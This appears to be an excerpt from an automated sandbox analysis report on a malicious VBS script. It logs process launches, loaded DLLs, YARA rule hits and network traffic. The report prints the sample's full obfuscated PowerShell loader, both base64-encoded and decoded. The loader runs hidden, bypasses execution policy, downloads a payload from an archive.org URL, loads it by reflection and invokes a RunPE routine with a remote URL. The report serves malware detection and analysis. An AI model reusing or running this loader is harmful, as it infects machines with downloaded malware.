              Source: powershell.exe, 00000004.00000002.1819764477.000001C456735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.arXr
              Source: powershell.exe, 00000004.00000002.1819764477.000001C4557E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
              Source: powershell.exe, 00000004.00000002.1819764477.000001C4557E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819764477.000001C456735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
              Source: powershell.exe, 00000004.00000002.1819764477.000001C4557E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtKqj;79dbase64Content
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1834352585.000001C465633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000004.00000002.1819764477.000001C456CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.11:49705 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: Process Memory Space: powershell.exe PID: 7584, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7744, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: 0BO4n723Q8.vbsInitial sample: Strings found which are bigger than 50
              Source: Process Memory Space: powershell.exe PID: 7584, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7744, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@6/6@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bldp1xfe.1ea.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs"
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 0BO4n723Q8.vbsVirustotal: Detection: 9%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0BO4n723Q8.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: ystem.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb/tL" source: powershell.exe, 00000004.00000002.1851044596.000001C46D76C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbb source: powershell.exe, 00000004.00000002.1852407179.000001C46DA40000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: *e.pdb=p source: powershell.exe, 00000004.00000002.1819295587.000001C45383C000.00000004.00000020.00020000.00000000.sdmp
